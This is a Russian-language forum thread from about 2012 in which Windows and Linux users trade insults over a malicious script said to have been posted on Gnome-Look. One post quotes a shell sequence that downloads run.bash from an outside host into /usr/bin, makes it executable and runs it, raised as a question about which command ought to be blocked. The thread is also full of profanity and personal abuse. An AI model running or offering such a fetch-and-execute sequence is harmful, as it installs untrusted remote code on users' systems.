Вы не вошли.

какой то "тупой вендузятнеГ" вас здесь троллит
Какой то тупой вендузятнеГ, не будем показывать пальцем какой именно, тут вовсю показывает свою дурь.
Yesterday it worked.
Today it is not working.
Windows is like that.
Скажи спасибо политрукам и Аполлоше. х*й вы от меня больше, чем косвенного дождётесь
Железно отмазался
И почему я не удивляюсь? У тебя косвенное спрашивали уже давно. Да только никаких ответов так и не получили.
Хотя некоторым уже всё показано
"Хорошим политрукам" показано? А "плохим политрукам" показывать отказываешься? 
На деле ничего там и нет сложного, обыкновенный скрипт.
Да, мы видели альфа-версии
С запуском по cron'у 
Хуле, какой то "тупой вендузятнеГ" вас здесь троллит
Та ни боже мой, дружок! Ты не нас троллишь. Ты троллишь исключительно самого себя. Как ты думаешь, почитав всю эту эпопею со "злобным вирусом", у кого-нибудь ещё останутся сомнения, почему твои бубунты постоянно падают? 
Добавлено спустя 02 мин 49 с:
Ну и тебя, во главе стада мудаков, с лозунгами про моск и "Антивирус нинужын"
Уж не намекаешь ли ты, что твой "злобный вирус" поразил мой Linux в виртуалке?
Может быть, ты тогда и закинешь мне мои логи, коли доступ имеешь? 
"Я как переезжал с ХР на Вин 7? Просто скопировал папку Program Files, а потом по мере необходимости возвращал софт оттуда. 100% уверенность, что не будет глюков." © Sergey2408
"Я хочу обвешать свой Winamp плагинами, но не хочу портить основную сборку.... Поэтому я просто ставлю ещё одну копию в папку /Program Files (x86)/Winamp1. Версия проги одна и та же" © Sergey2408

Да, мы видели альфа-версии lol С запуском по cron'у lol
И чо?
Важен результат!
Кстати, как я говорил, всё так же, как и в gnomelook может обновляться и апгрейдить модули, соответственно пароли явки, ну и алгоритм 
База сама по себе сплошной скрипт (с) AleksK
При том, что свежие очевидно работают лучше и исправляют некоторые глюки. А в линуксе они (глюки!!!)ещё и становятся нормальными (c) Журнашлюшка 

Apollo 11, я поражаюсь вашему терпению, оно превосходит даже мое. 
.:``́3̶E̶P̶O̶W̶h̶`́`:.

Какой то тупой вендузятнеГ, не будем показывать пальцем какой именно, тут вовсю показывает свою дурь.
А я и не спорю! Однако поделиё тупо шлёт логи
Сделай так же! Умный пенгванутый! 
При том, что свежие очевидно работают лучше и исправляют некоторые глюки. А в линуксе они (глюки!!!)ещё и становятся нормальными (c) Журнашлюшка 
И чо?
Да то, что я сам тебе описáл гораздо более простые способы, без повышения привилегий, да у тебя так и не хватило ума ими воспользоваться. Только и хватает ума на то, чтобы вопить про антивирус
Повторяю для особо одарённых: от зловреда, выложенного на Gnome-Look, антивирус не спасёт.
Важен результат!
...которого нет. Зато есть жуткие истории про "политруков", окопавшихся на СЛОРе, с целью отмщения "проклятым закапывателям" 
Добавлено спустя 02 мин 24 с:
Apollo 11, я поражаюсь вашему терпению, оно превосходит даже мое.
Да это чЮдо мне по два часа жизни прибавляет, когда я с ним общаюсь. Благодаря живительному и очистительному после рабочей недели хохоту. Я благодарить его должен. Он же мне сил придаёт на целую неделю трудовых будней 
"Я как переезжал с ХР на Вин 7? Просто скопировал папку Program Files, а потом по мере необходимости возвращал софт оттуда. 100% уверенность, что не будет глюков." © Sergey2408
"Я хочу обвешать свой Winamp плагинами, но не хочу портить основную сборку.... Поэтому я просто ставлю ещё одну копию в папку /Program Files (x86)/Winamp1. Версия проги одна и та же" © Sergey2408

Только и хватает ума на то, чтобы вопить про антивирус lol Повторяю для особо одарённых: от зловреда, выложенного на Gnome-Look, антивирус не спасёт.
X-Antivirus: avast! (VPS 120930-0, 30.09.2012), Outbound message X-Antivirus-Status: Clean
Это реальный результат, но тебе, идиоту, этого никогда не понять, илитному списиалисту. Потому как антивирус стуканул даже на примитивную пакость. Да так что даже вписал в мыло, что будет отражено в его журнале, кто когда и зачем посылал.
Отредактировано selenscy (06-10-12 23:35:27)

Apollo 11, ты всегда так много и обстоятельно пишешь, что создаётся ощущение, будто ты владеешь способом печати на клавиатуре более быстрым, чем просто слепой метод. Нет, серьёзно 
Помнится, я написал свои впечатления о 8-ке в топике про отключение Метро, так абзацев было меньше, чем в среднем твои стандартные посты (ты вроде говорил, что заходишь сюда краем галаза), а времени рабочего я убил минут 40, если не больше.
Случайности не случайны.

Он же мне сил придаёт на целую неделю трудовых будней
Ну да, мне оно тоже доставляет. 
Добавлено спустя 03 мин 51 с:
ты всегда так много и обстоятельно пишешь, что создаётся ощущение, будто ты владеешь способом печати на клавиатуре более быстрым, чем просто слепой метод
Линуксоиды обычно вообще хорошо владеют клавиатурой. Я свою клаву, на которой стерлись почти все буквы, давно выкинул. Печатаю со скоростью среднестатистического пользователя ПК только на тугих защищенных промышленных силиконовых клавиатурах, на удобной офисной скорость примерно совпадает со скоростью речи, и это нормально.

Linups_Troolvalds, Apollo 11, А кому он тут не доставляет. Его перлами весь мой отдел зачитывается. Говорят, можно книжку написать - "Письма из Кащенко"
Это реальный результат, но тебе, идиоту, этого никогда не понять, илитному списиалисту. Потому как антивирус стуканул даже на примитивную пакость.
Ага, ага
Это тот самый Avast!, который реальную заразу пропускает, а нормальный софт лочит?
Вот тебе ответ от Nebulos'ы:
cd /usr/bin/
wget 05748.t35.com/Bots/index.php
wget 05748.t35.com/Bots/run.bash
sleep 4
rm index.php
chmod 755 run.bash
command -p /usr/bin/run.bashкакую из набора команд нужно запрещать?.. Похожим образом, например, устанавливается Flash или Swiftfox
Вот и ответь на его вопрос.
Apollo 11, ты всегда так много и обстоятельно пишешь, что создаётся ощущение, будто ты владеешь способом печати на клавиатуре более быстрым, чем просто слепой метод. Нет, серьёзно
Ну, в общем-то, печатаю я быстро, да. Практика, знаете ли, большая.

кому он тут не доставляет.
Только аккуратнее, а то спугнем, а мудила ряженый так не доставляет, как этот.

Linups_Troolvalds, А что вспугивать-то? Дядьке реально 50 лет, а тут какие то малолетки его опускают. Нипанимает он этого, вот и вливается аки фанта.

Линуксоиды обычно вообще хорошо владеют клавиатурой.
Разве, это не ты учил меня не делить людей на линуксоидов и виндузятников?! Не тебе ли я доверился и перестал делить людей по признаку используемой ОС, а стал относиться к интернет-собеседникам исключительно по степени их адекватности, дружелюбности и количеству грамматических ошибок на единицу текста?! Как же так? Что случилось с тобой? 
Случайности не случайны.

который реальную заразу пропускает,
От ано чо! Оказывается реальная зараза то есть!
Молодцы, хуле! Допизделись!
Дык шлите тогда как в поделиё багрепорты!

От ано чо! Оказывается реальная зараза то есть! Молодцы, хуле! Допизделись!
А ты думаешь, мы никогда Виндой не пользовались? Или обзоры антивирусов не читали?
К тому же, не виляй филейными частями! По поводу существования заразы под Linux я же и говорил в первых же постах этой темы. И тебе не раз повторял и давал ссылки на свои посты. Но у тебя, видимо, что-то не так с понималкой, раз ты продолжаешь гундосить одно и то же. Или же тупо пытаешься обезболить свой баттхёрт.

Разве, это не ты учил меня не делить людей на линуксоидов и виндузятников?! Не тебе ли я доверился и перестал делить людей по признаку используемой ОС, а стал относиться к интернет-собеседникам исключительно по степени их адекватности, дружелюбности и количеству грамматических ошибок на единицу текста?! Как же так? Что случилось с тобой? smile
Да лан! Ну ёбнули пенгванутых по окаянному отростку, они уже всю "политкоректность" позабыли нах
Хы-хы!

От ано чо! Оказывается реальная зараза то есть!
Ага, есть, только в винде. Даже MSE лучше заразу фильтрует, при том на порядки.

Разве, это не ты учил меня не делить людей на линуксоидов и виндузятников?!
Да, я прав и неправ одновременно. Делить не хочу. Но статистически пользователи линукса быстрее печатают на клавиатуре.

А ты думаешь, мы никогда Виндой не пользовались? Или обзоры антивирусов не читали?
К тому же, не виляй филейными частями! По поводу существования заразы под Linux я же и говорил в первых же постах этой темы. И тебе не раз повторял и давал ссылки на свои посты. Но у тебя, видимо, что-то не так с понималкой, раз ты продолжаешь гундосить одно и то же. Или же тупо пытаешься обезболить свой баттхёрт.
Да до пизды мне, что ты там трямкал. Тут твои собратья по несчастью, вон совсем другого мнения 
Ну ёбнули пенгванутых по окаянному отростку, они уже всю "политкоректность" позабыли нах
Повторяй это почаще. Глядишь, и переживёшь этот свой очередной феерический слив с этой мантрой, валидолом и набором свечей от баттхёрта. А я спать пошёл. Смотри, не поломай меня полностью этой ночью 

Повторяй это почаще. Глядишь, и переживёшь этот свой очередной феерический слив с этой мантрой, валидолом и набором свечей от баттхёрта. А я спать пошёл. Смотри, не поломай меня полностью этой ночью lol
Спи, спи! Илитный списиалист
Спиртиком только протри системник с клавой 

свечей от баттхёрта
Там уже не то, что свечами, а группой проктологов не обойдешься. Госпитализация нужна уже.

Там уже не то, что свечами, а группой проктологов не обойдешься.
Я думаю, тут случай, когда эвтаназия показана без каких-либо вариантов.

Но статистически пользователи линукса быстрее печатают на клавиатуре.
"Линуксоиды в среднем печатают быстрее", "линуксоиды в среднем умнее", "у линуксоидов в среднем длиннее на 15 см". Ох, уж эти линкус-журналы. Linux Format, Full Circle, Ubuntu User... Если бы не они, вернулся б на винду гораздо раньше. 
Случайности не случайны.
[ Сгенерировано за 0.015 сек, 8 запросов выполнено - Использовано памяти: 1.81 Мбайт (Пик: 1.89 Мбайт) ]